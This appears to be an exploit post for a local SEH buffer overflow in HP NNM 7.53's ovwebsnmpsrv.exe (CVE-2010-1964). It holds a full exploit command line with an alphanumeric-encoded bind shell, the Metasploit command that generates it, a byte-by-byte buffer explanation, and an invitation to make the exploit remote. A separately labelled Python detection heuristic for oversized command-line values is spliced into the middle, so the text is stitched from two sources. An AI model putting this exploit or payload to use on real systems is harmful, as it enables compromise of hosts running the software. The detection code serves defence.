
# Title : HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Published : 2010-07-07
# Author : bitform


# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Date: 07/06/2010
# Author: bitform
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows XP SP2
# CVE: CVE-2010-1964

# Exploit:

C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-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,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC

# Notes: 

This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
a practical remote exploit. :D

Overflowing many of the other command line options overwrites SEH as well (e.g. -demo).
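Since the overflow is triggered by an oversized value passed to a command line option of ovwebsnmpsrv.exe (and, per the note above, to options other than -dump as well), process-creation telemetry is the natural place to catch it. The script below is an added detection example, not part of this post or of HP NNM: it assumes process-creation records exported as key=value text lines with an Image field and a CommandLine field (the constructed sample below uses that layout; the field names, the 64-byte threshold and the repeated-byte filler threshold are assumptions to adapt to your own log source), and it flags any option of that binary whose value is oversized or consists of long runs of one repeated byte.

```python
"""Detection heuristic for CVE-2010-1964-style abuse of ovwebsnmpsrv.exe.

Added as an illustrative example; it is not part of the original exploit
post or of HP NNM. Assumed input: process-creation records as 'key=value'
lines carrying an Image field and a CommandLine field (constructed layout
below). Thresholds are constructed starting points, not vendor values.
"""
import re

TARGET_IMAGE = "ovwebsnmpsrv.exe"
MAX_OPTION_VALUE = 64   # assumed threshold: legitimate option values are short
MIN_REPEAT_RUN = 16     # assumed threshold: long runs of one byte are typical filler

# Constructed sample records: one oversized -dump value, one benign -demo
# call, and one unrelated process that must be ignored.
SAMPLE_LOG = "\n".join([
    "Image=C:\\Program Files\\HP OpenView\\www\\bin\\ovwebsnmpsrv.exe "
    "CommandLine=ovwebsnmpsrv.exe -dump " + "A" * 80,
    "Image=C:\\Program Files\\HP OpenView\\www\\bin\\ovwebsnmpsrv.exe "
    "CommandLine=ovwebsnmpsrv.exe -demo 1",
    "Image=C:\\Windows\\System32\\notepad.exe "
    "CommandLine=notepad.exe C:\\tmp\\notes.txt",
])

RECORD_RE = re.compile(r"^Image=(?P<image>.*?)\s+CommandLine=(?P<cmd>.*)$")


def parse_record(line):
    """Return (image, command line) for one record, or None if it does not match."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return m.group("image"), m.group("cmd")


def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    best = run = 0
    prev = None
    for ch in s:
        run = run + 1 if ch == prev else 1
        prev = ch
        best = max(best, run)
    return best


def suspicious_options(cmdline):
    """Return [(option, value_length, reason)] for every option whose value
    looks like overflow filler. Every option is checked, not only -dump,
    because other options of this binary overflow the same way."""
    tokens = cmdline.split()
    findings = []
    for i, tok in enumerate(tokens):
        if not tok.startswith("-") or i + 1 >= len(tokens):
            continue
        value = tokens[i + 1]
        if len(value) > MAX_OPTION_VALUE:
            findings.append((tok, len(value), "oversized value"))
        elif longest_run(value) >= MIN_REPEAT_RUN:
            findings.append((tok, len(value), "repeated-byte filler"))
    return findings


def scan(log_text):
    """Apply the heuristic to every ovwebsnmpsrv.exe record in log_text."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        image, cmd = rec
        if not image.lower().endswith(TARGET_IMAGE):
            continue
        for opt, length, reason in suspicious_options(cmd):
            alerts.append({"image": image, "option": opt,
                           "length": length, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"ALERT {a['image']}: {a['option']} value of "
              f"{a['length']} bytes ({a['reason']})")
```

Running it on the constructed sample produces exactly one alert, for the -dump record. The length check catches the general case; the repeated-byte check is there because short filler such as "CCCC..." still stands out even when it falls under the size threshold. Tune both thresholds against the option values your own NNM installation actually passes before relying on this.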

Explanation of buffer:

"UXf-9Tf-9Tf-9TU"
Carve out EAX as the base register for the alphanumeric shellcode

"PYIIIIIIIIIIIIIIII7QZ"...
Alphanumeric bind shell
# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw

   / Overwrite SEH
  [  ]
"YY5AZCCX,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
      [                                           ]
       / Carve out non-conditional jmp to carve EAX code